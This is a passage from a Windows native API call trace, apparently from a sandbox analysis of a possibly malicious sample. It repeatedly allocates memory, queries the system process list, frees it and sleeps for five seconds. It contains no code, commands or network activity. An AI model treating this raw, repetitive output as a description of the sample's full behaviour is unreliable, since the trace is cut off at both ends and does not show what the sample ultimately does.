returned 0x0 [0213.389] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.390] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.391] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.391] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.392] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.392] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.392] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.396] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.397] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.399] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.400] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.400] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.401] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.401] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.405] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.405] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.407] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.407] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.408] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.408] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.408] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.412] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.413] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.414] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.414] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.415] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.416] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.416] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.420] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.421] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.422] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.423] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.423] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.424] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.424] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.428] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.429] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.431] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.431] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.432] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.432] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.432] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.437] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.438] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.439] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.439] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.440] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.440] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.441] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.445] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.446] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.448] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.448] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.449] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.450] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.450] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.454] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.455] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.457] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.458] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.458] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.459] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.459] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.463] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.464] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.466] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.466] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.467] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.467] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.468] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.472] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.473] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.475] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.475] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.476] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.476] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.476] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.481] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.482] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.484] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.484] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.485] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.485] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.486] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.490] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.491] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.493] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.493] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.494] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.494] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.494] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.499] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.500] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.502] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.502] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.503] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.504] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.504] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.508] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.509] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.511] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.511] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.512] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.513] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.513] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.518] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.519] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.521] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.521] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.522] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.522] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.522] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.527] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.528] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.531] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.531] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.532] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.532] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.533] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.538] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.539] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.540] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.540] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.541] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.542] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.542] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.546] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.547] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.549] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.549] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.550] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.550] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.550] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.555] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.556] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.557] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.558] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.559] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.559] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.559] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.564] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.565] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.566] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.566] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.568] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.568] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, 